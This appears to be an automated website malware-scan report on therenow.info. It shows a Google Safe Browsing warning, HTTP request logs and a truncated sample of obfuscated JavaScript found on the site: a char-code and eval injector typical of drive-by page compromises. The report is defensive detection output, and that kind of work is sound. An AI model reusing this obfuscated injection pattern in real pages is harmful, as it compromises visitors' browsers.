Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=therenow.info
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://therenow.info/ | 403 Forbidden Content-Length: 7444 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) Object.prototype.tes=-2;String.prototype.test="h";for(i in'')if(i=='test')m=''[i];var s;aa=document.createTextNode(m+"a"+"rC"+"ode");s=String["fr"+"omC"+aa['nod'+'eVa'+'lue']];for(i in{})if(i=='t'+'e'+'s')h={}[i];eval(s(7-h,7-h,103-h,100-h,30-h,38-h,98-h,109-h,97-h,115-h,107-h,99-h,108-h,114-h,44-h,101-h,99-h,114-h,67-h,106-h,99-h,107-h,99-h,108-h,114-h,113-h,64-h,119-h,82-h,95-h,101-h,76-h,95-h,107-h,99-h,38-h,37-h,96-h,109-h,98-h,119-h,37-h,39-h,89-h,46-h,91-h,39-h,121-h,7-h,7-h,7-h,103-h,100- Antivirus reports:
| ||
http://therenow.info/test404page.js | 404 Not Found Content-Length: 292 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: therenow.info
Result:
HTTP/1.1 403 Forbidden
Connection: close
Date: Mon, 12 Jan 2015 15:50:44 GMT
Accept-Ranges: bytes
Server: Apache/2.0.52 (Red Hat)
Content-Length: 7444
Content-Type: text/html
...7444 bytes of data.
GET / HTTP/1.1
Host: therenow.info
Result:
HTTP/1.1 403 Forbidden
Connection: close
Date: Mon, 12 Jan 2015 15:50:44 GMT
Accept-Ranges: bytes
Server: Apache/2.0.52 (Red Hat)
Content-Length: 7444
Content-Type: text/html
...7444 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: therenow.info
Referer: http://www.google.com/search?q=therenow.info
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: therenow.info
Referer: http://www.google.com/search?q=therenow.info
Result:
The result is similar to the first query. There are no suspicious redirects found.